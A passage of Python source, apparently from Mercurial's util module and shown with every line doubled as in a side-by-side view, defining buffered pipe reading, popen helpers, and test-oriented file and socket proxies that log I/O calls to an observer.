364 (allowing efficient readline) while offering a way to know if the buffer is
365 empty from the output (allowing collaboration of the buffer with polling).
365 empty from the output (allowing collaboration of the buffer with polling).
366
366
367 This class lives in the 'util' module because it makes use of the 'os'
367 This class lives in the 'util' module because it makes use of the 'os'
368 module from the python stdlib.
368 module from the python stdlib.
369 """
369 """
370 def __new__(cls, fh):
370 def __new__(cls, fh):
371 # If we receive a fileobjectproxy, we need to use a variation of this
371 # If we receive a fileobjectproxy, we need to use a variation of this
372 # class that notifies observers about activity.
372 # class that notifies observers about activity.
373 if isinstance(fh, fileobjectproxy):
373 if isinstance(fh, fileobjectproxy):
374 cls = observedbufferedinputpipe
374 cls = observedbufferedinputpipe
375
375
376 return super(bufferedinputpipe, cls).__new__(cls)
376 return super(bufferedinputpipe, cls).__new__(cls)
377
377
378 def __init__(self, input):
378 def __init__(self, input):
379 self._input = input
379 self._input = input
380 self._buffer = []
380 self._buffer = []
381 self._eof = False
381 self._eof = False
382 self._lenbuf = 0
382 self._lenbuf = 0
383
383
384 @property
384 @property
385 def hasbuffer(self):
385 def hasbuffer(self):
386 """True is any data is currently buffered
386 """True is any data is currently buffered
387
387
388 This will be used externally a pre-step for polling IO. If there is
388 This will be used externally a pre-step for polling IO. If there is
389 already data then no polling should be set in place."""
389 already data then no polling should be set in place."""
390 return bool(self._buffer)
390 return bool(self._buffer)
391
391
392 @property
392 @property
393 def closed(self):
393 def closed(self):
394 return self._input.closed
394 return self._input.closed
395
395
396 def fileno(self):
396 def fileno(self):
397 return self._input.fileno()
397 return self._input.fileno()
398
398
399 def close(self):
399 def close(self):
400 return self._input.close()
400 return self._input.close()
401
401
402 def read(self, size):
402 def read(self, size):
403 while (not self._eof) and (self._lenbuf < size):
403 while (not self._eof) and (self._lenbuf < size):
404 self._fillbuffer()
404 self._fillbuffer()
405 return self._frombuffer(size)
405 return self._frombuffer(size)
406
406
407 def readline(self, *args, **kwargs):
407 def readline(self, *args, **kwargs):
408 if 1 < len(self._buffer):
408 if 1 < len(self._buffer):
409 # this should not happen because both read and readline end with a
409 # this should not happen because both read and readline end with a
410 # _frombuffer call that collapse it.
410 # _frombuffer call that collapse it.
411 self._buffer = [''.join(self._buffer)]
411 self._buffer = [''.join(self._buffer)]
412 self._lenbuf = len(self._buffer[0])
412 self._lenbuf = len(self._buffer[0])
413 lfi = -1
413 lfi = -1
414 if self._buffer:
414 if self._buffer:
415 lfi = self._buffer[-1].find('\n')
415 lfi = self._buffer[-1].find('\n')
416 while (not self._eof) and lfi < 0:
416 while (not self._eof) and lfi < 0:
417 self._fillbuffer()
417 self._fillbuffer()
418 if self._buffer:
418 if self._buffer:
419 lfi = self._buffer[-1].find('\n')
419 lfi = self._buffer[-1].find('\n')
420 size = lfi + 1
420 size = lfi + 1
421 if lfi < 0: # end of file
421 if lfi < 0: # end of file
422 size = self._lenbuf
422 size = self._lenbuf
423 elif 1 < len(self._buffer):
423 elif 1 < len(self._buffer):
424 # we need to take previous chunks into account
424 # we need to take previous chunks into account
425 size += self._lenbuf - len(self._buffer[-1])
425 size += self._lenbuf - len(self._buffer[-1])
426 return self._frombuffer(size)
426 return self._frombuffer(size)
427
427
428 def _frombuffer(self, size):
428 def _frombuffer(self, size):
429 """return at most 'size' data from the buffer
429 """return at most 'size' data from the buffer
430
430
431 The data are removed from the buffer."""
431 The data are removed from the buffer."""
432 if size == 0 or not self._buffer:
432 if size == 0 or not self._buffer:
433 return ''
433 return ''
434 buf = self._buffer[0]
434 buf = self._buffer[0]
435 if 1 < len(self._buffer):
435 if 1 < len(self._buffer):
436 buf = ''.join(self._buffer)
436 buf = ''.join(self._buffer)
437
437
438 data = buf[:size]
438 data = buf[:size]
439 buf = buf[len(data):]
439 buf = buf[len(data):]
440 if buf:
440 if buf:
441 self._buffer = [buf]
441 self._buffer = [buf]
442 self._lenbuf = len(buf)
442 self._lenbuf = len(buf)
443 else:
443 else:
444 self._buffer = []
444 self._buffer = []
445 self._lenbuf = 0
445 self._lenbuf = 0
446 return data
446 return data
447
447
448 def _fillbuffer(self):
448 def _fillbuffer(self):
449 """read data to the buffer"""
449 """read data to the buffer"""
450 data = os.read(self._input.fileno(), _chunksize)
450 data = os.read(self._input.fileno(), _chunksize)
451 if not data:
451 if not data:
452 self._eof = True
452 self._eof = True
453 else:
453 else:
454 self._lenbuf += len(data)
454 self._lenbuf += len(data)
455 self._buffer.append(data)
455 self._buffer.append(data)
456
456
457 return data
457 return data
458
458
459 def mmapread(fp):
459 def mmapread(fp):
460 try:
460 try:
461 fd = getattr(fp, 'fileno', lambda: fp)()
461 fd = getattr(fp, 'fileno', lambda: fp)()
462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
463 except ValueError:
463 except ValueError:
464 # Empty files cannot be mmapped, but mmapread should still work. Check
464 # Empty files cannot be mmapped, but mmapread should still work. Check
465 # if the file is empty, and if so, return an empty buffer.
465 # if the file is empty, and if so, return an empty buffer.
466 if os.fstat(fd).st_size == 0:
466 if os.fstat(fd).st_size == 0:
467 return ''
467 return ''
468 raise
468 raise
469
469
470 def popen2(cmd, env=None, newlines=False):
470 def popen2(cmd, env=None, newlines=False):
471 # Setting bufsize to -1 lets the system decide the buffer size.
471 # Setting bufsize to -1 lets the system decide the buffer size.
472 # The default for bufsize is 0, meaning unbuffered. This leads to
472 # The default for bufsize is 0, meaning unbuffered. This leads to
473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
475 close_fds=closefds,
475 close_fds=closefds,
476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
477 universal_newlines=newlines,
477 universal_newlines=newlines,
478 env=env)
478 env=env)
479 return p.stdin, p.stdout
479 return p.stdin, p.stdout
480
480
481 def popen3(cmd, env=None, newlines=False):
481 def popen3(cmd, env=None, newlines=False):
482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
483 return stdin, stdout, stderr
483 return stdin, stdout, stderr
484
484
485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
487 close_fds=closefds,
487 close_fds=closefds,
488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
489 stderr=subprocess.PIPE,
489 stderr=subprocess.PIPE,
490 universal_newlines=newlines,
490 universal_newlines=newlines,
491 env=env)
491 env=env)
492 return p.stdin, p.stdout, p.stderr, p
492 return p.stdin, p.stdout, p.stderr, p
493
493
494 class fileobjectproxy(object):
494 class fileobjectproxy(object):
495 """A proxy around file objects that tells a watcher when events occur.
495 """A proxy around file objects that tells a watcher when events occur.
496
496
497 This type is intended to only be used for testing purposes. Think hard
497 This type is intended to only be used for testing purposes. Think hard
498 before using it in important code.
498 before using it in important code.
499 """
499 """
500 __slots__ = (
500 __slots__ = (
501 r'_orig',
501 r'_orig',
502 r'_observer',
502 r'_observer',
503 )
503 )
504
504
505 def __init__(self, fh, observer):
505 def __init__(self, fh, observer):
506 object.__setattr__(self, r'_orig', fh)
506 object.__setattr__(self, r'_orig', fh)
507 object.__setattr__(self, r'_observer', observer)
507 object.__setattr__(self, r'_observer', observer)
508
508
509 def __getattribute__(self, name):
509 def __getattribute__(self, name):
510 ours = {
510 ours = {
511 r'_observer',
511 r'_observer',
512
512
513 # IOBase
513 # IOBase
514 r'close',
514 r'close',
515 # closed if a property
515 # closed if a property
516 r'fileno',
516 r'fileno',
517 r'flush',
517 r'flush',
518 r'isatty',
518 r'isatty',
519 r'readable',
519 r'readable',
520 r'readline',
520 r'readline',
521 r'readlines',
521 r'readlines',
522 r'seek',
522 r'seek',
523 r'seekable',
523 r'seekable',
524 r'tell',
524 r'tell',
525 r'truncate',
525 r'truncate',
526 r'writable',
526 r'writable',
527 r'writelines',
527 r'writelines',
528 # RawIOBase
528 # RawIOBase
529 r'read',
529 r'read',
530 r'readall',
530 r'readall',
531 r'readinto',
531 r'readinto',
532 r'write',
532 r'write',
533 # BufferedIOBase
533 # BufferedIOBase
534 # raw is a property
534 # raw is a property
535 r'detach',
535 r'detach',
536 # read defined above
536 # read defined above
537 r'read1',
537 r'read1',
538 # readinto defined above
538 # readinto defined above
539 # write defined above
539 # write defined above
540 }
540 }
541
541
542 # We only observe some methods.
542 # We only observe some methods.
543 if name in ours:
543 if name in ours:
544 return object.__getattribute__(self, name)
544 return object.__getattribute__(self, name)
545
545
546 return getattr(object.__getattribute__(self, r'_orig'), name)
546 return getattr(object.__getattribute__(self, r'_orig'), name)
547
547
548 def __nonzero__(self):
548 def __nonzero__(self):
549 return bool(object.__getattribute__(self, r'_orig'))
549 return bool(object.__getattribute__(self, r'_orig'))
550
550
551 __bool__ = __nonzero__
551 __bool__ = __nonzero__
552
552
553 def __delattr__(self, name):
553 def __delattr__(self, name):
554 return delattr(object.__getattribute__(self, r'_orig'), name)
554 return delattr(object.__getattribute__(self, r'_orig'), name)
555
555
556 def __setattr__(self, name, value):
556 def __setattr__(self, name, value):
557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558
558
559 def __iter__(self):
559 def __iter__(self):
560 return object.__getattribute__(self, r'_orig').__iter__()
560 return object.__getattribute__(self, r'_orig').__iter__()
561
561
562 def _observedcall(self, name, *args, **kwargs):
562 def _observedcall(self, name, *args, **kwargs):
563 # Call the original object.
563 # Call the original object.
564 orig = object.__getattribute__(self, r'_orig')
564 orig = object.__getattribute__(self, r'_orig')
565 res = getattr(orig, name)(*args, **kwargs)
565 res = getattr(orig, name)(*args, **kwargs)
566
566
567 # Call a method on the observer of the same name with arguments
567 # Call a method on the observer of the same name with arguments
568 # so it can react, log, etc.
568 # so it can react, log, etc.
569 observer = object.__getattribute__(self, r'_observer')
569 observer = object.__getattribute__(self, r'_observer')
570 fn = getattr(observer, name, None)
570 fn = getattr(observer, name, None)
571 if fn:
571 if fn:
572 fn(res, *args, **kwargs)
572 fn(res, *args, **kwargs)
573
573
574 return res
574 return res
575
575
576 def close(self, *args, **kwargs):
576 def close(self, *args, **kwargs):
577 return object.__getattribute__(self, r'_observedcall')(
577 return object.__getattribute__(self, r'_observedcall')(
578 r'close', *args, **kwargs)
578 r'close', *args, **kwargs)
579
579
580 def fileno(self, *args, **kwargs):
580 def fileno(self, *args, **kwargs):
581 return object.__getattribute__(self, r'_observedcall')(
581 return object.__getattribute__(self, r'_observedcall')(
582 r'fileno', *args, **kwargs)
582 r'fileno', *args, **kwargs)
583
583
584 def flush(self, *args, **kwargs):
584 def flush(self, *args, **kwargs):
585 return object.__getattribute__(self, r'_observedcall')(
585 return object.__getattribute__(self, r'_observedcall')(
586 r'flush', *args, **kwargs)
586 r'flush', *args, **kwargs)
587
587
588 def isatty(self, *args, **kwargs):
588 def isatty(self, *args, **kwargs):
589 return object.__getattribute__(self, r'_observedcall')(
589 return object.__getattribute__(self, r'_observedcall')(
590 r'isatty', *args, **kwargs)
590 r'isatty', *args, **kwargs)
591
591
592 def readable(self, *args, **kwargs):
592 def readable(self, *args, **kwargs):
593 return object.__getattribute__(self, r'_observedcall')(
593 return object.__getattribute__(self, r'_observedcall')(
594 r'readable', *args, **kwargs)
594 r'readable', *args, **kwargs)
595
595
596 def readline(self, *args, **kwargs):
596 def readline(self, *args, **kwargs):
597 return object.__getattribute__(self, r'_observedcall')(
597 return object.__getattribute__(self, r'_observedcall')(
598 r'readline', *args, **kwargs)
598 r'readline', *args, **kwargs)
599
599
600 def readlines(self, *args, **kwargs):
600 def readlines(self, *args, **kwargs):
601 return object.__getattribute__(self, r'_observedcall')(
601 return object.__getattribute__(self, r'_observedcall')(
602 r'readlines', *args, **kwargs)
602 r'readlines', *args, **kwargs)
603
603
604 def seek(self, *args, **kwargs):
604 def seek(self, *args, **kwargs):
605 return object.__getattribute__(self, r'_observedcall')(
605 return object.__getattribute__(self, r'_observedcall')(
606 r'seek', *args, **kwargs)
606 r'seek', *args, **kwargs)
607
607
608 def seekable(self, *args, **kwargs):
608 def seekable(self, *args, **kwargs):
609 return object.__getattribute__(self, r'_observedcall')(
609 return object.__getattribute__(self, r'_observedcall')(
610 r'seekable', *args, **kwargs)
610 r'seekable', *args, **kwargs)
611
611
612 def tell(self, *args, **kwargs):
612 def tell(self, *args, **kwargs):
613 return object.__getattribute__(self, r'_observedcall')(
613 return object.__getattribute__(self, r'_observedcall')(
614 r'tell', *args, **kwargs)
614 r'tell', *args, **kwargs)
615
615
616 def truncate(self, *args, **kwargs):
616 def truncate(self, *args, **kwargs):
617 return object.__getattribute__(self, r'_observedcall')(
617 return object.__getattribute__(self, r'_observedcall')(
618 r'truncate', *args, **kwargs)
618 r'truncate', *args, **kwargs)
619
619
620 def writable(self, *args, **kwargs):
620 def writable(self, *args, **kwargs):
621 return object.__getattribute__(self, r'_observedcall')(
621 return object.__getattribute__(self, r'_observedcall')(
622 r'writable', *args, **kwargs)
622 r'writable', *args, **kwargs)
623
623
624 def writelines(self, *args, **kwargs):
624 def writelines(self, *args, **kwargs):
625 return object.__getattribute__(self, r'_observedcall')(
625 return object.__getattribute__(self, r'_observedcall')(
626 r'writelines', *args, **kwargs)
626 r'writelines', *args, **kwargs)
627
627
628 def read(self, *args, **kwargs):
628 def read(self, *args, **kwargs):
629 return object.__getattribute__(self, r'_observedcall')(
629 return object.__getattribute__(self, r'_observedcall')(
630 r'read', *args, **kwargs)
630 r'read', *args, **kwargs)
631
631
632 def readall(self, *args, **kwargs):
632 def readall(self, *args, **kwargs):
633 return object.__getattribute__(self, r'_observedcall')(
633 return object.__getattribute__(self, r'_observedcall')(
634 r'readall', *args, **kwargs)
634 r'readall', *args, **kwargs)
635
635
636 def readinto(self, *args, **kwargs):
636 def readinto(self, *args, **kwargs):
637 return object.__getattribute__(self, r'_observedcall')(
637 return object.__getattribute__(self, r'_observedcall')(
638 r'readinto', *args, **kwargs)
638 r'readinto', *args, **kwargs)
639
639
640 def write(self, *args, **kwargs):
640 def write(self, *args, **kwargs):
641 return object.__getattribute__(self, r'_observedcall')(
641 return object.__getattribute__(self, r'_observedcall')(
642 r'write', *args, **kwargs)
642 r'write', *args, **kwargs)
643
643
644 def detach(self, *args, **kwargs):
644 def detach(self, *args, **kwargs):
645 return object.__getattribute__(self, r'_observedcall')(
645 return object.__getattribute__(self, r'_observedcall')(
646 r'detach', *args, **kwargs)
646 r'detach', *args, **kwargs)
647
647
648 def read1(self, *args, **kwargs):
648 def read1(self, *args, **kwargs):
649 return object.__getattribute__(self, r'_observedcall')(
649 return object.__getattribute__(self, r'_observedcall')(
650 r'read1', *args, **kwargs)
650 r'read1', *args, **kwargs)
651
651
652 class observedbufferedinputpipe(bufferedinputpipe):
652 class observedbufferedinputpipe(bufferedinputpipe):
653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654
654
655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 bypass ``fileobjectproxy``. Because of this, we need to make
656 bypass ``fileobjectproxy``. Because of this, we need to make
657 ``bufferedinputpipe`` aware of these operations.
657 ``bufferedinputpipe`` aware of these operations.
658
658
659 This variation of ``bufferedinputpipe`` can notify observers about
659 This variation of ``bufferedinputpipe`` can notify observers about
660 ``os.read()`` events. It also re-publishes other events, such as
660 ``os.read()`` events. It also re-publishes other events, such as
661 ``read()`` and ``readline()``.
661 ``read()`` and ``readline()``.
662 """
662 """
663 def _fillbuffer(self):
663 def _fillbuffer(self):
664 res = super(observedbufferedinputpipe, self)._fillbuffer()
664 res = super(observedbufferedinputpipe, self)._fillbuffer()
665
665
666 fn = getattr(self._input._observer, r'osread', None)
666 fn = getattr(self._input._observer, r'osread', None)
667 if fn:
667 if fn:
668 fn(res, _chunksize)
668 fn(res, _chunksize)
669
669
670 return res
670 return res
671
671
672 # We use different observer methods because the operation isn't
672 # We use different observer methods because the operation isn't
673 # performed on the actual file object but on us.
673 # performed on the actual file object but on us.
674 def read(self, size):
674 def read(self, size):
675 res = super(observedbufferedinputpipe, self).read(size)
675 res = super(observedbufferedinputpipe, self).read(size)
676
676
677 fn = getattr(self._input._observer, r'bufferedread', None)
677 fn = getattr(self._input._observer, r'bufferedread', None)
678 if fn:
678 if fn:
679 fn(res, size)
679 fn(res, size)
680
680
681 return res
681 return res
682
682
683 def readline(self, *args, **kwargs):
683 def readline(self, *args, **kwargs):
684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685
685
686 fn = getattr(self._input._observer, r'bufferedreadline', None)
686 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 if fn:
687 if fn:
688 fn(res)
688 fn(res)
689
689
690 return res
690 return res
691
691
692 PROXIED_SOCKET_METHODS = {
692 PROXIED_SOCKET_METHODS = {
693 r'makefile',
693 r'makefile',
694 r'recv',
694 r'recv',
695 r'recvfrom',
695 r'recvfrom',
696 r'recvfrom_into',
696 r'recvfrom_into',
697 r'recv_into',
697 r'recv_into',
698 r'send',
698 r'send',
699 r'sendall',
699 r'sendall',
700 r'sendto',
700 r'sendto',
701 r'setblocking',
701 r'setblocking',
702 r'settimeout',
702 r'settimeout',
703 r'gettimeout',
703 r'gettimeout',
704 r'setsockopt',
704 r'setsockopt',
705 }
705 }
706
706
707 class socketproxy(object):
707 class socketproxy(object):
708 """A proxy around a socket that tells a watcher when events occur.
708 """A proxy around a socket that tells a watcher when events occur.
709
709
710 This is like ``fileobjectproxy`` except for sockets.
710 This is like ``fileobjectproxy`` except for sockets.
711
711
712 This type is intended to only be used for testing purposes. Think hard
712 This type is intended to only be used for testing purposes. Think hard
713 before using it in important code.
713 before using it in important code.
714 """
714 """
715 __slots__ = (
715 __slots__ = (
716 r'_orig',
716 r'_orig',
717 r'_observer',
717 r'_observer',
718 )
718 )
719
719
720 def __init__(self, sock, observer):
720 def __init__(self, sock, observer):
721 object.__setattr__(self, r'_orig', sock)
721 object.__setattr__(self, r'_orig', sock)
722 object.__setattr__(self, r'_observer', observer)
722 object.__setattr__(self, r'_observer', observer)
723
723
724 def __getattribute__(self, name):
724 def __getattribute__(self, name):
725 if name in PROXIED_SOCKET_METHODS:
725 if name in PROXIED_SOCKET_METHODS:
726 return object.__getattribute__(self, name)
726 return object.__getattribute__(self, name)
727
727
728 return getattr(object.__getattribute__(self, r'_orig'), name)
728 return getattr(object.__getattribute__(self, r'_orig'), name)
729
729
730 def __delattr__(self, name):
730 def __delattr__(self, name):
731 return delattr(object.__getattribute__(self, r'_orig'), name)
731 return delattr(object.__getattribute__(self, r'_orig'), name)
732
732
733 def __setattr__(self, name, value):
733 def __setattr__(self, name, value):
734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
735
735
736 def __nonzero__(self):
736 def __nonzero__(self):
737 return bool(object.__getattribute__(self, r'_orig'))
737 return bool(object.__getattribute__(self, r'_orig'))
738
738
739 __bool__ = __nonzero__
739 __bool__ = __nonzero__
740
740
741 def _observedcall(self, name, *args, **kwargs):
741 def _observedcall(self, name, *args, **kwargs):
742 # Call the original object.
742 # Call the original object.
743 orig = object.__getattribute__(self, r'_orig')
743 orig = object.__getattribute__(self, r'_orig')
744 res = getattr(orig, name)(*args, **kwargs)
744 res = getattr(orig, name)(*args, **kwargs)
745
745
746 # Call a method on the observer of the same name with arguments
746 # Call a method on the observer of the same name with arguments
747 # so it can react, log, etc.
747 # so it can react, log, etc.
748 observer = object.__getattribute__(self, r'_observer')
748 observer = object.__getattribute__(self, r'_observer')
749 fn = getattr(observer, name, None)
749 fn = getattr(observer, name, None)
750 if fn:
750 if fn:
751 fn(res, *args, **kwargs)
751 fn(res, *args, **kwargs)
752
752
753 return res
753 return res
754
754
755 def makefile(self, *args, **kwargs):
755 def makefile(self, *args, **kwargs):
756 res = object.__getattribute__(self, r'_observedcall')(
756 res = object.__getattribute__(self, r'_observedcall')(
757 r'makefile', *args, **kwargs)
757 r'makefile', *args, **kwargs)
758
758
759 # The file object may be used for I/O. So we turn it into a
759 # The file object may be used for I/O. So we turn it into a
760 # proxy using our observer.
760 # proxy using our observer.
761 observer = object.__getattribute__(self, r'_observer')
761 observer = object.__getattribute__(self, r'_observer')
762 return makeloggingfileobject(observer.fh, res, observer.name,
762 return makeloggingfileobject(observer.fh, res, observer.name,
763 reads=observer.reads,
763 reads=observer.reads,
764 writes=observer.writes,
764 writes=observer.writes,
765 logdata=observer.logdata,
765 logdata=observer.logdata,
766 logdataapis=observer.logdataapis)
766 logdataapis=observer.logdataapis)
767
767
768 def recv(self, *args, **kwargs):
768 def recv(self, *args, **kwargs):
769 return object.__getattribute__(self, r'_observedcall')(
769 return object.__getattribute__(self, r'_observedcall')(
770 r'recv', *args, **kwargs)
770 r'recv', *args, **kwargs)
771
771
772 def recvfrom(self, *args, **kwargs):
772 def recvfrom(self, *args, **kwargs):
773 return object.__getattribute__(self, r'_observedcall')(
773 return object.__getattribute__(self, r'_observedcall')(
774 r'recvfrom', *args, **kwargs)
774 r'recvfrom', *args, **kwargs)
775
775
776 def recvfrom_into(self, *args, **kwargs):
776 def recvfrom_into(self, *args, **kwargs):
777 return object.__getattribute__(self, r'_observedcall')(
777 return object.__getattribute__(self, r'_observedcall')(
778 r'recvfrom_into', *args, **kwargs)
778 r'recvfrom_into', *args, **kwargs)
779
779
780 def recv_into(self, *args, **kwargs):
780 def recv_into(self, *args, **kwargs):
781 return object.__getattribute__(self, r'_observedcall')(
781 return object.__getattribute__(self, r'_observedcall')(
782 r'recv_info', *args, **kwargs)
782 r'recv_info', *args, **kwargs)
783
783
784 def send(self, *args, **kwargs):
784 def send(self, *args, **kwargs):
785 return object.__getattribute__(self, r'_observedcall')(
785 return object.__getattribute__(self, r'_observedcall')(
786 r'send', *args, **kwargs)
786 r'send', *args, **kwargs)
787
787
788 def sendall(self, *args, **kwargs):
788 def sendall(self, *args, **kwargs):
789 return object.__getattribute__(self, r'_observedcall')(
789 return object.__getattribute__(self, r'_observedcall')(
790 r'sendall', *args, **kwargs)
790 r'sendall', *args, **kwargs)
791
791
792 def sendto(self, *args, **kwargs):
792 def sendto(self, *args, **kwargs):
793 return object.__getattribute__(self, r'_observedcall')(
793 return object.__getattribute__(self, r'_observedcall')(
794 r'sendto', *args, **kwargs)
794 r'sendto', *args, **kwargs)
795
795
796 def setblocking(self, *args, **kwargs):
796 def setblocking(self, *args, **kwargs):
797 return object.__getattribute__(self, r'_observedcall')(
797 return object.__getattribute__(self, r'_observedcall')(
798 r'setblocking', *args, **kwargs)
798 r'setblocking', *args, **kwargs)
799
799
800 def settimeout(self, *args, **kwargs):
800 def settimeout(self, *args, **kwargs):
801 return object.__getattribute__(self, r'_observedcall')(
801 return object.__getattribute__(self, r'_observedcall')(
802 r'settimeout', *args, **kwargs)
802 r'settimeout', *args, **kwargs)
803
803
804 def gettimeout(self, *args, **kwargs):
804 def gettimeout(self, *args, **kwargs):
805 return object.__getattribute__(self, r'_observedcall')(
805 return object.__getattribute__(self, r'_observedcall')(
806 r'gettimeout', *args, **kwargs)
806 r'gettimeout', *args, **kwargs)
807
807
808 def setsockopt(self, *args, **kwargs):
808 def setsockopt(self, *args, **kwargs):
809 return object.__getattribute__(self, r'_observedcall')(
809 return object.__getattribute__(self, r'_observedcall')(
810 r'setsockopt', *args, **kwargs)
810 r'setsockopt', *args, **kwargs)
811
811
812 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
812 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
813 DATA_ESCAPE_MAP.update({
813 DATA_ESCAPE_MAP.update({
814 b'\\': b'\\\\',
814 b'\\': b'\\\\',
815 b'\r': br'\r',
815 b'\r': br'\r',
816 b'\n': br'\n',
816 b'\n': br'\n',
817 })
817 })
818 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
818 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
819
819
820 def escapedata(s):
820 def escapedata(s):
821 if isinstance(s, bytearray):
821 if isinstance(s, bytearray):
822 s = bytes(s)
822 s = bytes(s)
823
823
824 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
824 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
825
825
826 class baseproxyobserver(object):
826 class baseproxyobserver(object):
827 def _writedata(self, data):
827 def _writedata(self, data):
828 if not self.logdata:
828 if not self.logdata:
829 if self.logdataapis:
829 if self.logdataapis:
830 self.fh.write('\n')
830 self.fh.write('\n')
831 self.fh.flush()
831 self.fh.flush()
832 return
832 return
833
833
834 # Simple case writes all data on a single line.
834 # Simple case writes all data on a single line.
835 if b'\n' not in data:
835 if b'\n' not in data:
836 if self.logdataapis:
836 if self.logdataapis:
837 self.fh.write(': %s\n' % escapedata(data))
837 self.fh.write(': %s\n' % escapedata(data))
838 else:
838 else:
839 self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
839 self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
840 self.fh.flush()
840 self.fh.flush()
841 return
841 return
842
842
843 # Data with newlines is written to multiple lines.
843 # Data with newlines is written to multiple lines.
844 if self.logdataapis:
844 if self.logdataapis:
845 self.fh.write(':\n')
845 self.fh.write(':\n')
846
846
847 lines = data.splitlines(True)
847 lines = data.splitlines(True)
848 for line in lines:
848 for line in lines:
849 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
849 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
850 self.fh.flush()
850 self.fh.flush()
851
851
852 class fileobjectobserver(baseproxyobserver):
852 class fileobjectobserver(baseproxyobserver):
853 """Logs file object activity."""
853 """Logs file object activity."""
854 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
854 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
855 logdataapis=True):
855 logdataapis=True):
856 self.fh = fh
856 self.fh = fh
857 self.name = name
857 self.name = name
858 self.logdata = logdata
858 self.logdata = logdata
859 self.logdataapis = logdataapis
859 self.logdataapis = logdataapis
860 self.reads = reads
860 self.reads = reads
861 self.writes = writes
861 self.writes = writes
862
862
863 def read(self, res, size=-1):
863 def read(self, res, size=-1):
864 if not self.reads:
864 if not self.reads:
865 return
865 return
866 # Python 3 can return None from reads at EOF instead of empty strings.
866 # Python 3 can return None from reads at EOF instead of empty strings.
867 if res is None:
867 if res is None:
868 res = ''
868 res = ''
869
869
870 if self.logdataapis:
870 if self.logdataapis:
871 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
871 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
872
872
873 self._writedata(res)
873 self._writedata(res)
874
874
875 def readline(self, res, limit=-1):
875 def readline(self, res, limit=-1):
876 if not self.reads:
876 if not self.reads:
877 return
877 return
878
878
879 if self.logdataapis:
879 if self.logdataapis:
880 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
880 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
881
881
882 self._writedata(res)
882 self._writedata(res)
883
883
884 def readinto(self, res, dest):
884 def readinto(self, res, dest):
885 if not self.reads:
885 if not self.reads:
886 return
886 return
887
887
888 if self.logdataapis:
888 if self.logdataapis:
889 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
889 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
890 res))
890 res))
891
891
892 data = dest[0:res] if res is not None else b''
892 data = dest[0:res] if res is not None else b''
893 self._writedata(data)
893 self._writedata(data)
894
894
895 def write(self, res, data):
895 def write(self, res, data):
896 if not self.writes:
896 if not self.writes:
897 return
897 return
898
898
899 # Python 2 returns None from some write() calls. Python 3 (reasonably)
899 # Python 2 returns None from some write() calls. Python 3 (reasonably)
900 # returns the integer bytes written.
900 # returns the integer bytes written.
901 if res is None and data:
901 if res is None and data:
902 res = len(data)
902 res = len(data)
903
903
904 if self.logdataapis:
904 if self.logdataapis:
905 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
905 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
906
906
907 self._writedata(data)
907 self._writedata(data)
908
908
909 def flush(self, res):
909 def flush(self, res):
910 if not self.writes:
910 if not self.writes:
911 return
911 return
912
912
913 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
913 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
914
914
915 # For observedbufferedinputpipe.
915 # For observedbufferedinputpipe.
916 def bufferedread(self, res, size):
916 def bufferedread(self, res, size):
917 if not self.reads:
917 if not self.reads:
918 return
918 return
919
919
920 if self.logdataapis:
920 if self.logdataapis:
921 self.fh.write('%s> bufferedread(%d) -> %d' % (
921 self.fh.write('%s> bufferedread(%d) -> %d' % (
922 self.name, size, len(res)))
922 self.name, size, len(res)))
923
923
924 self._writedata(res)
924 self._writedata(res)
925
925
926 def bufferedreadline(self, res):
926 def bufferedreadline(self, res):
927 if not self.reads:
927 if not self.reads:
928 return
928 return
929
929
930 if self.logdataapis:
930 if self.logdataapis:
